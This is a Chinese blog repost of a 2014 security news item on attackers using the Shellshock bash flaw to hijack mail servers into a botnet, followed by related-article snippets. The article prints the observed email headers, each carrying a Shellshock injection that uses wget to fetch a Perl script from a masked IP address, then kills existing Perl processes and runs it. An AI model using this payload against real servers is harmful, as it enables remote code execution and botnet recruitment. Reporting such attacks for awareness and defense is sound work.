来了!攻击者利用Shellshock漏洞入侵邮件服务器

最新推荐文章于 2021-05-07 01:10:12 发布
最新推荐文章于 2021-05-07 01:10:12 发布
阅读量125 收藏
点赞数
原文链接:https://yq.aliyun.com/articles/85649
版权

来了!攻击者利用Shellshock漏洞入侵邮件服务器

攻击者正利用上个月披露的Shellshock漏洞入侵邮件服务器建立僵尸网络。

安全研究人员报告,攻击者向邮件服务器发送特定的消息头字段,诱骗服务器执行一个 Perl脚本,成为僵尸网络的一部分。邮件消息头的构成是:

 
  
  1.  Shellshock spam October 2014 IP地址已隐藏) 
  2. ===
  3.  To:() { :; };wget -O /tmp/.legend http://xxx.xx.xxx.xx/legend.txt;killall -9 perl;perl /tmp/.legend 
  4.  
  5.  References:() { :; };wget -O /tmp/.legend http://xxx.xx.xxx.xx/legend.txt;killall -9 perl;perl /tmp/.legend 
  6.  
  7.  Cc:() { :; };wget -O /tmp/.legend http://xxx.xx.xxx.xx/legend.txt;killall -9 perl;perl /tmp/.legend 
  8.  
  9.  From:() { :; };wget -O /tmp/.legend http://xxx.xx.xxx.xx/legend.txt;killall -9 perl;perl /tmp/.legend 
  10.  
  11.  Subject:() { :; };wget -O /tmp/.legend http://xxx.xx.xxx.xx/legend.txt;killall -9 perl;perl /tmp/.legend 
  12.  
  13.  Date:() { :; };wget -O /tmp/.legend http://xxx.xx.xxx.xx/legend.txt;killall -9 perl;perl /tmp/.legend 
  14.  
  15.  Message-ID:() { :; };wget -O /tmp/.legend http://xxx.xx.xxx.xx/legend.txt;killall -9 perl;perl /tmp/.legend 
  16.  
  17.  Comments:() { :; };wget -O /tmp/.legend http://xxx.xx.xxx.xx/legend.txt;killall -9 perl;perl /tmp/.legend 
  18.  
  19.  Keywords:() { :; };wget -O /tmp/.legend http://xxx.xx.xxx.xx/legend.txt;killall -9 perl;perl /tmp/.legend 
  20.  
  21.  Resent-Date:() { :; };wget -O /tmp/.legend http://xxx.xx.xxx.xx/legend.txt;killall -9 perl;perl /tmp/.legend 
  22.  
  23.  Resent-From:() { :; };wget -O /tmp/.legend http://xxx.xx.xxx.xx/legend.txt;killall -9 perl;perl /tmp/.legend 
  24.  
  25.  Resent-Sender:() { :; };wget -O /tmp/.legend http://xxx.xx.xxx.xx/legend.txt;killall -9 perl;perl /tmp/.legend 
 
  
原文发布时间:2014-10-29
 
  
本文来自云栖合作伙伴“linux中国”
 
 
 
 
 
  
 
 
 
 
 
  
 
 
 


                

        

        




    




    

      

        

            

              
                
                  weixin_33888907
                
              
            

            

                关注
              
            

        

        

          
    
            
  • 
              
                
                
                
                
                      0
                
              
              
    点赞
    
            
    • 
            
  • 
              
                
                
                
              
              
    
            
    • 
            
  • 
              
                
                
                
                
                    0
                
              
              
    
                
    
                  
                    收藏
                  
                
    
              
    
              
    
                
    
                  觉得还不错?
                  
                    一键收藏
                  
                 
                
    
              
    
            
    • 
          
  • 
            
    
              
              
            
    
              
              
              
                    0
              
            
            
    评论
    
          
    • 
          
  • 
          
    • 
          
  • 
            
              
            
              
    
            
              
                
            
    
          
    • 
        

      

      










                



	

		

			

				
					
ShellShock(破壳漏洞)的简单分析

				
			

			

				

					爱唠叨的老鱼
				

				

					09-27
					
					1万+
					
				

			

		

		

			
				
(1)什么是ShellShock?
(2)ShellShock漏洞的原理。
(3)ShellShock漏洞的危害。
(4)如何修复ShellShock漏洞

			
		

	



                

              
                



	

		

			

				
					
shocker:查找和利用易受Shellshock攻击服务器的工具

				
			

			

				

					05-13
				

			

		

		

			
				
查找和利用易受Shellshock攻击服务器的工具 参考: :   由NCC Group Plc作为开源发布-https:   由开发:  汤姆·沃森(Tom Watson),汤姆[点]沃森[at] nccgroup [点]信任  根据AGPL发布,请参阅许可以获取更多...

			
		

	



                


  
              

                


	

		

			

				
					
攻击者利用 Shellshock 漏洞入侵邮件服务器

				
			

			

				

					weixin_33750452的博客
				

				

					06-02
					
					201
					
				

			

		

		

			
				
攻击者利用上个月披露的Shellshock漏洞入侵邮件服务器建立僵尸网络。Shellshock漏洞是指攻击者向使用bash的Unix/Linux服务器发送精心构造的请求,诱骗bash远程执行命令。安全研究人员报告,攻击者邮件服务器发送特定的消息头字段,诱骗服务器执行一个 Perl脚本,成为僵尸网络的一部分。邮件消息头的构成是:    
Message...

			
		

	





	

		

			

				
					
TLS漏洞:超过50万个电子邮件服务器容易受黑客攻击,太可怕了

				
			

			

				

					weixin_30472035的博客
				

				

					09-08
					
					404
					
				

			

		

		

			
				
2019年在流行的开源Exim电子邮件服务器软件中发现了一个关键的远程执行代码漏洞,至少有超过50万个电子邮件服务器容易受到远程黑客攻击。Exim是一种广泛使用的开源邮件传输代理(MTA)软件,为类似Unix的操作系统(如Linux,Mac OSX或Solaris)开发,目前运行着近60%的互联网电子邮件服务器,用于路由,传递和接收电子邮件。




Exim官网今日公布版本...

			
		

	



		

			
		



	

		

			

				
					
教务邮箱遭入侵引发邮件服务器安全思考

				
			

			

				

					weixin_34099526的博客
				

				

					12-10
					
					592
					
				

			

		

		

			
				
2019独角兽企业重金招聘Python工程师标准>>>   
                                        
         ...

			
		

	





	

		

			

				
					
UMail邮件服务器竖铜墙铁壁有效阻止垃圾邮件入侵

				
			

			

				

					weixin_33860722的博客
				

				

					07-26
					
					407
					
				

			

		

		

			
				
为什么80%的码农都做不了架构师?>>> 
                                        
                ...

			
		

	





	

		

			

				
					
Shellshock漏洞回顾与分析测试

				
			

			

				

					weixin_33709219的博客
				

				

					03-08
					
					360
					
				

			

		

		

			
				
Debug_Orz · 2014/10/21 14:140x00 漏洞概述很多人或许对2014上半年发生的安全问题“心脏流血”(Heartbleed Bug)事件记忆颇深,2014年9月,又出现了另外一个“毁灭级”的漏洞——Bash软件安全漏洞。这个漏洞由法国GNU/Linux爱好者Stéphane Chazelas所发现。随后,美国电脑应急响应中心(US-CERT)、红帽以及多家从事安全的公司于...

			
		

	





	

		

			

				
					
linux 服务器攻击,linux服务器攻击处理过程(示例代码)

				
			

			

				

					weixin_39885683的博客
				

				

					05-07
					
					306
					
				

			

		

		

			
				
开始排查首先检查日志,以前做过安全运维,所以写过类似于检查命令和工具,开始一一排查。#查看是否为管理员增加或者修改find/ -type f -perm 4000#显示文件中查看是否存在系统以外的文件rpm-Vf /bin/lsrpm-Vf /usr/sbin/sshdrpm-Vf /sbin/ifconfigrpm-Vf /usr/sbin/lsof#检查系统是否有elf文件被替换#在web目录...

			
		

	





	

		

			

				
					
ShellShockHunter:这是测试漏洞Shellshock的简单工具

				
			

			

				

					05-05
				

			

		

		

			
				
ShellShockHunter v1.0 这是测试漏洞...Shellshock可能使攻击者导致Bash执行任意命令并获得对许多Internet-使用Bash处理请求的面向服务(例如Web服务器)。免责声明该程序或先前的程序仅用于教育目的。 未经允许请勿使

			
		

	





	

		

			

				
					
shellshock 漏洞  bash漏洞rpm包升级包

				
			

			

				

					09-28
				

			

		

		

			
				
研究人员周四发布警告称 黑客已经开始利用最新的“Shellshock”电脑漏洞 借助蠕虫病毒扫描有漏洞的系统 然后感染这些  redhat 6 5以上版本32 位64位 升级包

			
		

	





	

		

			

				
					
Bash漏洞——Shellshock浅析.pdf

				
			

			

				

					07-10
				

			

		

		

			
				
最常见和推荐的解决方案是安装官方发布的安全补丁,这可以有效地阻止攻击者利用漏洞。此外,保持系统和软件的及时更新,以及定期进行安全审计和漏洞扫描,也是防止类似漏洞的关键措施。  Shellshock的出现提醒我们...

			
		

	





	

		

			

				
					
shellshock漏洞的redhat最新补丁及说明

				
			

			

				

					10-04
				

			

		

		

			
				
由于Bash shell在处理某些环境变量时存在缺陷,攻击者可以利用这个漏洞注入恶意代码,从而获得对系统的完全控制。  在"shellshock漏洞的redhat最新补丁及说明"中,Red Hat企业Linux(RHEL)5和RHEL 6这两个版本受到...

			
		

	





	

		

			

				
					
培训课件 -从0到1搭建培训管理体系.pptx

				
			

			

				

					07-13
				

			

		

		

			
				
培训课件 -从0到1搭建培训管理体系.pptx

			
		

	





	

		

			

				
					
tensorflow-gpu-2.9.0-cp37-cp37m-win-amd64.whl.zip.(whl)

					
最新发布

				
			

			

				

					07-14
				

			

		

		

			
				
使用时需去掉后缀.(whl)后再解压

			
		

	





	

		

			

				
					
JavaScript:ES6新特性深入解析

				
			

			

				

					07-14
				

			

		

		

			
				
JavaScript:ES6新特性深入解析

			
		

	





	

		

			

				
					
Go:Go语言项目实战教程

				
			

			

				

					07-14
				

			

		

		

			
				
Go:Go语言项目实战教程

			
		

	





	

		

			

				
					
一些流行的原生和第三方平台的App开发教程和源代码项目资源

				
			

			

				

					07-14
				

			

		

		

			
				
App开发是一个广泛的话题,涉及多个平台和语言。以下是一些流行的原生和第三方平台的App开发教程和源代码项目资源:

### 原生开发

1. **iOS (Swift)**
   - 官方文档:[Apple Developer Documentation](https://developer.apple.com/documentation/)
   - 教程:[Ray Wenderlich](https://www.raywenderlich.com/library)
   - 开源项目:[SwiftKickMobile - 各种Swift开源项目集合](https://github.com/SwiftKickMobile)

2. **Android (Kotlin/Java)**
   - 官方文档:[Android Developers](https://developer.android.com/docs)
   - 教程:[CodePath Android Cliffnotes](https://guides.codepath.com/android)
   - 开源项目:

			
		

	





	

		

			

				
					
shellshock漏洞利用

				
			

			

				

					04-03
				

			

		

		

			
				
Shellshock漏洞是一个存在于Bash(Unix和Linux操作系统的一种常用Shell)中的安全漏洞,它于2014年被公开。该漏洞允许攻击者通过构造恶意的环境变量来执行任意的命令,从而导致系统被入侵Shellshock漏洞利用方式有多种,以下是其中一种常见的利用方法:

1. 构造恶意环境变量:攻击者可以通过在HTTP请求的头部或者CGI脚本中注入恶意的环境变量来触发Shellshock漏洞。例如,攻击者可以在User-Agent字段中注入恶意代码。

2. 执行任意命令:一旦成功利用Shellshock漏洞攻击者可以执行任意的命令。这可能包括获取敏感信息、修改系统配置、植入后门等。

为了防止Shellshock漏洞利用,以下是一些建议的防御措施:

1. 及时更新:及时更新操作系统和软件包,以确保已修复Shellshock漏洞的补丁已安装。

2. 使用Web应用防火墙(WAF):WAF可以检测和阻止恶意请求,包括Shellshock漏洞利用尝试。

3. 输入验证和过滤:对于用户输入的数据,进行严格的验证和过滤,以防止恶意代码的注入。

4. 最小权限原则:将系统和应用程序的权限限制在最小必需的级别,以减少攻击者利用漏洞的影响范围。

			
		

	



              



  
“相关推荐”对你有帮助么?

  

      
    
          
  • 
              
    
                  
                  
              
    
              
    非常没帮助
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    没帮助
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    一般
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    有帮助
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    非常有帮助
    
          
    • 
      

      

      

          
          提交
      

      

  




          




        



    





    



      

      

        
      

      





	

		评论	
	

	
	




  

    

      添加红包
      
    

    

      

        
        

          
          
        

        
请填写红包祝福语或标题

      

      

        
        

          
          
        

        
红包个数最小为10个

      

      

        
        

          
          
        

        
红包金额最低5元

      

      

        
        

          当前余额3.43前往充值 >
        

      

      

        

          需支付:10.00

        
        
      

    

  





  

    
    
  

  

    
    
  








  

    

      

        

          

            
            
成就一亿技术人!

          

          

        

        

          

          

            领取后你会自动成为博主和红包主的粉丝
            规则
          

        

      

      

        

          

            
              
            
            

              
hope_wisdom
 发出的红包
            

          

        

        

          

          

          

        

      

    

    

  



      
      

      
实付

      
使用余额支付

      

        

          

            
            点击重新获取
          

        

        
扫码支付

      

      

        
          
            
          
          
        
      

      

        
        钱包余额
          0
          

            
            

              

                
抵扣说明:

                
 1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
 2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

              

            

          

      

      余额充值